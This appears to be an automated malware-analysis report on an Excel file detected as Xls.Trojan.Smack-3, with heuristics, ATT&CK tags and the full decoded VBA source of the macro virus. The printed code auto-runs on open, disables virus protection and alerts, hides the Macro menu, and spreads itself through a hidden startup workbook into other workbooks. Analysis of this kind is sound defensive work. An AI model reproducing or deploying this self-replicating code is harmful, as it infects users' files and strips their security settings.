MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically an Auto_Open subroutine, which is a common technique for executing malicious code upon opening a document. The macro attempts to disable security features and manipulate application settings. While the full payload is truncated, the presence of the Auto_Open macro and the ClamAV detection strongly suggest malicious intent, likely as a spearphishing attachment.
Heuristics 3
-
ClamAV: Xls.Trojan.Smack-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Smack-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3045 bytes |
SHA-256: 64daa78cd8f9fb7d4c77ba1ae28ae93fcbeddcf1281a36d61f1c679e78387c66 |
|||
|
Detection
ClamAV:
Xls.Trojan.Smack-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Smack"
'Hey people, I'm new here..
'Do you know my name?
'The name's XM97.Smack!!!
'Heh... now you're seeing my code eh..
'OK, you got me...
'Come on, kill me!!!
'Ummm, on second thought...
'Please don't kill me, Pretty PLEASE..
'PLEASE DON'T KILL ME
'I want to live forever...
'Forever Young!
'Heheh
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Options.VirusProtection = False
MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
If Not IsGlobalInfected() Then
Aaaaahhhh
End If
Application.OnSheetActivate = "XLDATA.XLM!Smack1"
If (Day(Now) = "10") And (Month(Now) = "9") Then
MsgBox "You know what?" & Chr$(13) & "You're getting OLD, man!!!", , "Smack!!!"
End If
End Sub
Function IsGlobalInfected() As Boolean
Attribute IsGlobalInfected.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo Smack_3
IsGlobalInfected = False
For A = 1 To Application.Workbooks.Count
If Application.Workbooks(A).Name = "XLDATA.XLM" Then
For b = 1 To Application.Workbooks("XLDATA.XLM").Modules.Count
If Application.Workbooks("XLDATA.XLM").Modules(b).Name = "Smack" Then
IsGlobalInfected = True
End If
Next b
End If
Next A
Smack_3:
End Function
Function Aaaaahhhh()
Attribute Aaaaahhhh.VB_ProcData.VB_Invoke_Func = " \n14"
ab = ActiveWorkbook.Name
Workbooks(ab).SaveCopyAs Application.StartupPath + "\XLDATA.XLM"
Workbooks.Open (Application.StartupPath + "\XLDATA.XLM")
Windows("XLDATA.XLM").Visible = False
Application.Workbooks("XLDATA.XLM").Save
End Function
Function DocIsInfected() As Boolean
Attribute DocIsInfected.VB_ProcData.VB_Invoke_Func = " \n14"
abc = ActiveWorkbook.Name
DocIsInfected = False
For y = 1 To Application.Workbooks(abc).Modules.Count
If Application.Workbooks(abc).Modules(y).Name = "Smack" Then
DocIsInfected = True
End If
Next y
End Function
Sub Smack1()
Attribute Smack1.VB_ProcData.VB_Invoke_Func = " \n14"
abcd = ActiveWorkbook.Name
If Not DocIsInfected() Then
Application.ScreenUpdating = False
Application.Windows("XLDATA.XLM").Visible = True
Workbooks("XLDATA.XLM").Activate
Sheets("smack").Visible = True
Workbooks("XLDATA.XLM").Sheets("Smack").Copy Before:=Workbooks(abcd).Sheets(1)
Workbooks(abcd).Sheets("Smack").Visible = False
Workbooks("XLDATA.XLM").Sheets("Smack").Visible = False
Application.Windows("XLDATA.XLM").Visible = False
End If
Close
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.